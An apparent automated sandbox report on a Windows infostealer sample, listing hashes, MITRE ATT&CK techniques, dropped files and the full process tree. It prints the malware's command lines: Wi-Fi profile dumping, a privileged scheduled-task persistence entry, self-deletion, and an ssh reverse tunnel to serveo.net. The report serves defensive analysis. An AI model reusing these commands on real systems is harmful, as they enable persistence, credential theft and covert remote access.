bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9

General

Target

bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Size

2.8MB
MD5

63ba5ec400ebbe6af65441f442652faa
SHA1

3b8807f8124c0e0d8c8cd816f9a7bc30476fbf5c
SHA256

bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9
SHA512

e240e9e07d88908057bba587e32ef1499d0c2d235eed61f1e996ce8959e1c323068ad483a96a7010ea0050440e12a0d82782e79baa186e880e4727452f3a4baf
SSDEEP

49152:2mVZpRE5HFjH4MLMmcX17+kSmn75+dEsgY5OK:fgvFcXV3cJ5

Score

8^/10

collection discovery spyware stealer

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

services.exeservices.exessh.exeservices.exeservices.exeservices.exeservices.exe

pid process

2872 services.exe
2060 services.exe
4704 ssh.exe
1908 services.exe
4724 services.exe
424 services.exe
4628 services.exe
Loads dropped DLL 1 IoCs

Processes:

ssh.exe

pid process

4704 ssh.exe
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2872	services.exe
2060	services.exe
4704	ssh.exe
1908	services.exe
4724	services.exe
424	services.exe
4628	services.exe

pid	process
4704	ssh.exe

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exeservices.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	services.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	services.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	services.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1496 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

68 timeout.exe
4584 timeout.exe

flow	ioc
1	ip-api.com

pid	process
1496	schtasks.exe

pid	process
68	timeout.exe
4584	timeout.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exeservices.exe

pid	process
824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
2060	services.exe
2060	services.exe
2060	services.exe
2060	services.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exeservices.exeservices.exeservices.exeservices.exeservices.exeservices.exe

description	pid	process
Token: SeDebugPrivilege	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Token: SeDebugPrivilege	2872	services.exe
Token: SeDebugPrivilege	2060	services.exe
Token: SeDebugPrivilege	1908	services.exe
Token: SeDebugPrivilege	4724	services.exe
Token: SeDebugPrivilege	424	services.exe
Token: SeDebugPrivilege	4628	services.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

services.exe

pid process

2060 services.exe

pid	process
2060	services.exe

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.execmd.execmd.exeservices.execmd.execmd.exeservices.execmd.execmd.exe

description	pid	process	target process
PID 824 wrote to memory of 1736	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe	cmd.exe
PID 824 wrote to memory of 1736	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe	cmd.exe
PID 1736 wrote to memory of 3164	1736	cmd.exe	chcp.com
PID 1736 wrote to memory of 3164	1736	cmd.exe	chcp.com
PID 1736 wrote to memory of 1372	1736	cmd.exe	netsh.exe
PID 1736 wrote to memory of 1372	1736	cmd.exe	netsh.exe
PID 1736 wrote to memory of 4784	1736	cmd.exe	findstr.exe
PID 1736 wrote to memory of 4784	1736	cmd.exe	findstr.exe
PID 824 wrote to memory of 2332	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe	cmd.exe
PID 824 wrote to memory of 2332	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe	cmd.exe
PID 2332 wrote to memory of 1912	2332	cmd.exe	chcp.com
PID 2332 wrote to memory of 1912	2332	cmd.exe	chcp.com
PID 2332 wrote to memory of 2908	2332	cmd.exe	netsh.exe
PID 2332 wrote to memory of 2908	2332	cmd.exe	netsh.exe
PID 2332 wrote to memory of 2596	2332	cmd.exe	findstr.exe
PID 2332 wrote to memory of 2596	2332	cmd.exe	findstr.exe
PID 824 wrote to memory of 2872	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe	services.exe
PID 824 wrote to memory of 2872	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe	services.exe
PID 824 wrote to memory of 1480	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe	cmd.exe
PID 824 wrote to memory of 1480	824	bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe	cmd.exe
PID 2872 wrote to memory of 1904	2872	services.exe	cmd.exe
PID 2872 wrote to memory of 1904	2872	services.exe	cmd.exe
PID 1480 wrote to memory of 780	1480	cmd.exe	chcp.com
PID 1480 wrote to memory of 780	1480	cmd.exe	chcp.com
PID 1904 wrote to memory of 1944	1904	cmd.exe	chcp.com
PID 1904 wrote to memory of 1944	1904	cmd.exe	chcp.com
PID 1480 wrote to memory of 4584	1480	cmd.exe	timeout.exe
PID 1480 wrote to memory of 4584	1480	cmd.exe	timeout.exe
PID 1904 wrote to memory of 68	1904	cmd.exe	timeout.exe
PID 1904 wrote to memory of 68	1904	cmd.exe	timeout.exe
PID 1904 wrote to memory of 1496	1904	cmd.exe	schtasks.exe
PID 1904 wrote to memory of 1496	1904	cmd.exe	schtasks.exe
PID 1904 wrote to memory of 2060	1904	cmd.exe	services.exe
PID 1904 wrote to memory of 2060	1904	cmd.exe	services.exe
PID 2060 wrote to memory of 2288	2060	services.exe	cmd.exe
PID 2060 wrote to memory of 2288	2060	services.exe	cmd.exe
PID 2288 wrote to memory of 2588	2288	cmd.exe	chcp.com
PID 2288 wrote to memory of 2588	2288	cmd.exe	chcp.com
PID 2288 wrote to memory of 1340	2288	cmd.exe	netsh.exe
PID 2288 wrote to memory of 1340	2288	cmd.exe	netsh.exe
PID 2288 wrote to memory of 784	2288	cmd.exe	findstr.exe
PID 2288 wrote to memory of 784	2288	cmd.exe	findstr.exe
PID 2060 wrote to memory of 3012	2060	services.exe	cmd.exe
PID 2060 wrote to memory of 3012	2060	services.exe	cmd.exe
PID 3012 wrote to memory of 4340	3012	cmd.exe	chcp.com
PID 3012 wrote to memory of 4340	3012	cmd.exe	chcp.com
PID 3012 wrote to memory of 4132	3012	cmd.exe	netsh.exe
PID 3012 wrote to memory of 4132	3012	cmd.exe	netsh.exe
PID 3012 wrote to memory of 4380	3012	cmd.exe	findstr.exe
PID 3012 wrote to memory of 4380	3012	cmd.exe	findstr.exe
PID 2060 wrote to memory of 4704	2060	services.exe	ssh.exe
PID 2060 wrote to memory of 4704	2060	services.exe	ssh.exe
PID 2060 wrote to memory of 4704	2060	services.exe	ssh.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

services.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	services.exe

outlook_win_path 1 IoCs

Processes:

services.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	services.exe

C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
"C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe"
1⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
2⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\system32\chcp.com
chcp 65001
3⤵
PID:3164

C:\Windows\system32\netsh.exe
netsh wlan show profiles
3⤵
PID:1372

C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
3⤵
PID:4784

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
2⤵
- Suspicious use of WriteProcessMemory
PID:2332

C:\Windows\system32\chcp.com
chcp 65001
3⤵
PID:1912

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
3⤵
PID:2908

C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
3⤵
PID:2596

C:\Users\Admin\AppData\Roaming\services.exe
"C:\Users\Admin\AppData\Roaming\services.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "services" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Roaming\services.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:1944

C:\Windows\system32\timeout.exe
timeout /t 3
4⤵
- Delays execution with timeout.exe
PID:68

C:\Windows\system32\schtasks.exe
schtasks /create /tn "services" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:1496

C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
"C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe"
4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2060

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
5⤵
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:2588

C:\Windows\system32\netsh.exe
netsh wlan show profiles
6⤵
PID:1340

C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
6⤵
PID:784

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
5⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:4340

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
6⤵
PID:4132

C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
6⤵
PID:4380

C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe
"C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6060 serveo.net
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\system32\chcp.com
chcp 65001
3⤵
PID:780

C:\Windows\system32\timeout.exe
timeout /t 3
3⤵
- Delays execution with timeout.exe
PID:4584

C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4724

C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:424

C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4628

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Unsecured Credentials

3

T1552

Credentials In Files

2

T1552.001

Credentials in Registry

1

T1552.002

Discovery

Query Registry

2

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

3

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log
Filesize
847B

MD5
a908a7c6e93edeb3e400780b6fe62dde

SHA1
36e2b437f41443f6b41b45b35a0f97b2cd94123d

SHA256
cae801b0499949178298c1c1a083f7c0febb971d262be9c9588437af66c76ef0

SHA512
deb437dcb1440d37bcd61dfa43be05fd01856a1d1e59aa5b2dfa142e9ae584b0577eea024edb99d8e74e3a1b606bb7ae3b4f9cd8eb30813e67dda678b9319cbe

Download Submit
C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\libcrypto.dll
Filesize
1.5MB

MD5
79a6e2268dfdba1d94c27f4b17265ff4

SHA1
b17eed8cb6f454700f8bfcfd315d5627d3cf741c

SHA256
6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

SHA512
3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

Download Submit
C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe
Filesize
914KB

MD5
d1ce628a81ab779f1e8f7bf7df1bb32c

SHA1
011c90c704bb4782001d6e6ce1c647bf2bb17e01

SHA256
2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

SHA512
de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

Download Submit
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
Filesize
120KB

MD5
479d30cd484920e686388641718edc53

SHA1
c7040a1893168c204c759280d9671b0b58890c8c

SHA256
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601

SHA512
e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d

Download Submit
C:\Users\Admin\AppData\Local\lbdd1brp2p\p.dat
Filesize
4B

MD5
ba347fcc9a79fb74e95670b24848164f

SHA1
f7627f1519939e9be9489509f793ed4d1d1d85e6

SHA256
060e33205a731400c2eb92bc12cf921a4e44cf1851d216f144337dd6ec5350a7

SHA512
65e3cba510a50198204ac82811e71c341a9558becf2a89cf52071a07fb65b15c1d27262b797566ac08173091ead35ddb8e54fa68f5e268cd78322d79e23f70d6

Download Submit
memory/824-3-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

Filesize
9.9MB

Download
memory/824-16-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

Filesize
9.9MB

Download
memory/824-5-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

Filesize
9.9MB

Download
memory/824-4-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

Filesize
9.9MB

Download
memory/824-0-0x00007FFC92233000-0x00007FFC92234000-memory.dmp

Filesize
4KB

Download
memory/824-2-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

Filesize
9.9MB

Download
memory/824-1-0x00000000022C0000-0x00000000022E2000-memory.dmp

Filesize
136KB

Download
memory/2872-12-0x000002DE352A0000-0x000002DE352C4000-memory.dmp

Filesize
144KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads